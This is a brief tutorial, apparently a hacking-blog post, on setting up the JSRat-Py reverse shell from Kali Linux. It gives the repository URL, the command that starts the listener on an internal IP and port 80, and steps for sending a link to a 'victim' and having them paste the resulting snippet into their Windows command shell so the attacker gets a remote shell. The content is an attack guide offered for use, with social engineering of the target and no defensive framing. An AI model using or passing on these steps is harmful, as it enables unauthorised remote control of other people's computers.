JSRAT is a Simple JS Reverse Shell over HTTP for Windows, We run web server and then execute commands against the connecting Client/Victim. So you can now run the attack server from any OS instead of being limited to a Windows OS with Powershell enabled.
Open your kali Linux terminal and type the following command
https://github.com/Hood3dRob1n/JSRat-Py.git
Now go to the jsrat foler using cd JSRAT-Py and the following command to run jsrat
./JSRAT.py –i 192.168.0.140 –p 80
Now Server is Up and Listening. Copy Client Command link i.e.http://192.168.0.140:80/wtfand send it to the victim. As the victim opens the link in the browser a snippet will appear like this.
Copy that snippet and paste in the cmd shell of victim.
As soon as the victim executes it you will get a reverse connection back in your kali terminal.